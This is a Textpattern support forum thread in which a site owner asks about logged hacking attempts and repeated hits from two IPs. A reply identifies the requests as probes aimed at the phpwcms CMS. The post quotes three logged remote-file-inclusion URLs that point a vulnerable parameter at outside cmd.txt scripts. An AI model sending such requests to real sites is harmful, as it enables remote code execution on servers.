Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Pages: 1
unsuccessful hacking attempts
My Slimstat is registering a lot of hits on resources similar to the ones below
http://www.hblack.net/hblack/index.php?id=38/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.flylink.psi.br/arquivos/cmd2.txt?
http://www.hblack.net/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.flylink.psi.br/arquivos/cmd2.txt?
http://www.hblack.net/hblack/index.php?id=38/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://201.37.71.117:8090/cmd.txt??
Textpattern of course is standing strong against those attacks but filtering deeper I get the stats below
| Visitor | Hits | Visits | IPs |
| 65.36.241.81 | 10182 | 10003 | 1 |
| 65.36.241.79 | 4051 | 3991 | 1 |
Am I right in assuming that there is a real abuse from 65.36.241.81?
Does anyone know of the particular IP?
Should I just block it?
Advise needed here:)
Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Offline
Re: unsuccessful hacking attempts
Looks like an attack aimed at a CMS called “phpwcms”. If you don’t have that installed, just ignore those attempts.
What’s interesting is that both IPnrs belong to a netblock owned by internetseer.com. One of the services they offer is “hacker check”.
Offline
Offline
Re: unsuccessful hacking attempts
thanks ruud
i guess i’ll just temporarily wait and see but 10003 is a lot of bandwidth even for a small 40k page
Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Offline
Pages: 1